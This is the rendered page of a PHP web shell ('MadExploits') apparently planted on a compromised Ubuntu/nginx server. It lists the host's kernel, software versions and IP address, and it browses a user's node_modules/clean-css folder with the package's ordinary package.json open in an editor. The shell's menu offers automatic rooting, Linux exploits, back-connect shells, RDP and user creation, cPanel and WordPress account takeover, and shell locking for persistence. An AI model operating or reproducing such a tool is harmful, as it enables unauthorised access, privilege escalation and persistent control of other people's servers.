Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
clean-css /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
dr-xr-xr-x
node_modules
[ DIR ]
dr-xr-xr-x
History.md
83.37
KB
-rw-rw-rw-
LICENSE
1.04
KB
-rw-rw-rw-
README.md
40.51
KB
-rw-rw-rw-
index.js
41
B
-rw-rw-rw-
package.json
1.1
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "clean-css", "version": "5.3.3", "author": "Jakub Pawlowicz <contact@jakubpawlowicz.com>", "description": "A well-tested CSS minifier", "license": "MIT", "keywords": [ "css", "minifier" ], "homepage": "https://github.com/clean-css/clean-css", "repository": { "type": "git", "url": "https://github.com/clean-css/clean-css.git" }, "bugs": { "url": "https://github.com/clean-css/clean-css/issues" }, "main": "index.js", "files": [ "lib", "History.md", "index.js", "LICENSE" ], "scripts": { "browserify": "browserify --standalone CleanCSS index.js | uglifyjs --compress --mangle -o cleancss-browser.js", "bench": "node ./test/bench.js", "lint": "eslint ./lib/ --ext .js", "test": "vows" }, "dependencies": { "source-map": "~0.6.0" }, "devDependencies": { "browserify": "^17.0.0", "eslint": "^8.8.0", "eslint-config-airbnb-base": "^15.0.0", "http-proxy": "1.x", "nock": "^13.0.0", "server-destroy": "1.x", "uglify-js": ">=2.6.1", "vows": "0.8.x" }, "engines": { "node": ">= 10.0" } }
Close